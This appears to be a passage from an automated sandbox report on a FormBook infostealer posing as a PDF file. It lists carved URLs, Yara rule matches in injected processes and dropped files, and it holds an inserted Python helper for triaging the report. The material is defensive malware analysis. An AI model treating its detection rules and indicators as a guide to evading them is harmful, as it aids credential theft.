Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com-
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: ipconfig.exe, 00000009.00000003.2215032606.0000000006088000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000007.00000000.2149784147.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4601846350.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comEMd
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000002.4598436939.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075926924.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132972491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979257208.00000000099AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comM
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000007.00000002.4595914565.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Source: Yara match File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
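The Yara-match lines above (together with the per-rule "Matched rule" lines under System Summary) and the "String found in binary or memory" URL lines are far easier to reason about per process than per line: the same payload is matched in the unpacked PE and in several memory dumps of the same process, and most of the carved URLs are ordinary Windows or Firefox strings that happen to sit in the memory of a hollowed process. The following Python helper is an added example and is not part of this report or of Joe Sandbox. It parses copies of report lines, maps each memory-dump identifier to its analysis process, lists the Yara-matching regions that are both writable and executable, and groups carved URL hosts by process. The reading of the dump-name fields is an assumption (analysis PID in hex, stage, sequence number, region base, Win32 page protection; the trailing three fields are left undecoded) that is only cross-checked against this page, where dump 00000011 and unpack name 17.2.calc.exe refer to the same process (0x11 = 17). The sample lines are copied from this report and are marked as constructed test input.

```python
"""Triage helper for the 'Source: ...' lines of a Joe Sandbox report (added example).

Assumed layout of a memory-dump name, checked against this page only:
<PID hex>.<stage>.<seq>.<base, 16 hex>.<page protection>.<x>.<y>.<z>.sdmp
(00000011 == 17 == '17.2.calc.exe...'); the last three fields are not decoded here.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Win32 PAGE_* constants (winnt.h), used to read the protection field of a dump name.
PAGE_PROTECT = {0x01: "NOACCESS", 0x02: "READONLY", 0x04: "READWRITE", 0x08: "WRITECOPY",
                0x10: "EXECUTE", 0x20: "EXECUTE_READ", 0x40: "EXECUTE_READWRITE",
                0x80: "EXECUTE_WRITECOPY"}

DUMP_RE = re.compile(r"(?P<pid>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.(?P<base>[0-9A-F]{16})"
                     r"\.(?P<prot>[0-9A-F]{8})(?:\.[0-9A-F]{8}){3}\.sdmp")
# Unpacked-PE names: <pid>.<stage>.<process name, may contain spaces>.<base hex>.<n>[.raw].unpack
UNPACK_RE = re.compile(r"(?P<pid>\d+)\.\d+\.(?P<proc>.+?)\.(?P<base>[0-9a-f]+)\.\d+(?:\.raw)?\.unpack")
# "<process name>, <dump name>" pairs are where the report gives the PID -> name mapping.
NAMED_DUMP_RE = re.compile(r"(?:Source:|,)\s*([^,]+?),\s*(" + DUMP_RE.pattern + ")")
URL_RE = re.compile(r"String found in binary or memory: (\S+)")
RULE_RE = re.compile(r"Matched rule: (.+?) Author:")

# Constructed test input: lines copied verbatim from this report.
SAMPLE_LINES = """\
Source: explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0/
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0
Source: Yara match File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000007.00000002.4604222907.0000000011264000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
"""


def _new_proc():
    return {"name": set(), "urls": set(), "yara_rules": set(), "yara_regions": set()}


def parse_report(lines):
    """Aggregate 'Source:' lines into {pid: {name, urls, yara_rules, yara_regions}}.

    Dropped-file sources (*.dr) carry no PID and are skipped, so certificate URLs such as
    the Sectigo CPS string attached to the sample file do not get attributed to a process.
    """
    procs = defaultdict(_new_proc)
    for line in lines:
        regions = []  # (pid, base, protection or None) for every dump/unpack token on the line
        for m in DUMP_RE.finditer(line):
            prot = int(m["prot"], 16)
            regions.append((int(m["pid"], 16), int(m["base"], 16), PAGE_PROTECT.get(prot, hex(prot))))
        for m in UNPACK_RE.finditer(line):
            pid = int(m["pid"])
            procs[pid]["name"].add(m["proc"])
            regions.append((pid, int(m["base"], 16), None))  # protection unknown for unpacked PEs
        for m in NAMED_DUMP_RE.finditer(line):
            procs[int(m.group(2)[:8], 16)]["name"].add(m.group(1).strip())
        url = URL_RE.search(line)
        rule = RULE_RE.search(line)
        is_yara = "Yara match" in line or rule is not None
        for pid, base, prot in regions:
            p = procs[pid]
            if url:
                p["urls"].add(url.group(1))
            if is_yara:
                p["yara_regions"].add((base, prot))
                if rule:
                    p["yara_rules"].add(rule.group(1))
    return dict(procs)


def rwx_yara_regions(procs):
    """Yara-matching regions that are EXECUTE_READWRITE: code written into a process at run time.

    A legitimately loaded image section is never RWX, so a FormBook match inside such a region
    of csc.exe, calc.exe or ipconfig.exe is the injected payload, not the host binary.
    """
    out = []
    for pid, p in sorted(procs.items()):
        for base, prot in sorted(p["yara_regions"], key=lambda r: r[0]):
            if prot == "EXECUTE_READWRITE":
                out.append((pid, "/".join(sorted(p["name"])) or "?", base))
    return out


def hosts_by_process(procs):
    """host -> sorted process names whose memory contained a URL on that host."""
    hosts = defaultdict(set)
    for p in procs.values():
        for url in p["urls"]:
            host = urlsplit(url).hostname  # carving artefacts such as 'mozilla.org0' stay visible
            if host:
                hosts[host].update(p["name"] or {"?"})
    return {h: sorted(n) for h, n in sorted(hosts.items())}


if __name__ == "__main__":
    T = parse_report(SAMPLE_LINES.splitlines())
    for pid, name, base in rwx_yara_regions(T):
        print(f"PID {pid:>2} {name:<14} RWX Yara region at 0x{base:X}")
    for host, names in hosts_by_process(T).items():
        print(f"{host:<18} carved from {', '.join(names)}")
```

Run on the full report rather than the sample, the RWX list is the shortlist of processes to dump and the host list is a de-duplication aid only: a URL string carved from process memory is not evidence of a connection (the msn.com and login.live.com strings here are explorer.exe and Live ID boilerplate, and "mozilla.org0" is a carving artefact), so compare the hosts against the report's DNS and HTTP sections before treating any of them as C2.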

System Summary

Source: C:\Windows\SysWOW64\ipconfig.exe Dropped file: C:\Users\user\AppData\Roaming\J8AR3449\J8Alogrv.ini Jump to dropped file
Source: C:\Windows\SysWOW64\ipconfig.exe Dropped file: C:\Users\user\AppData\Roaming\J8AR3449\J8Alogri.ini Jump to dropped file
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
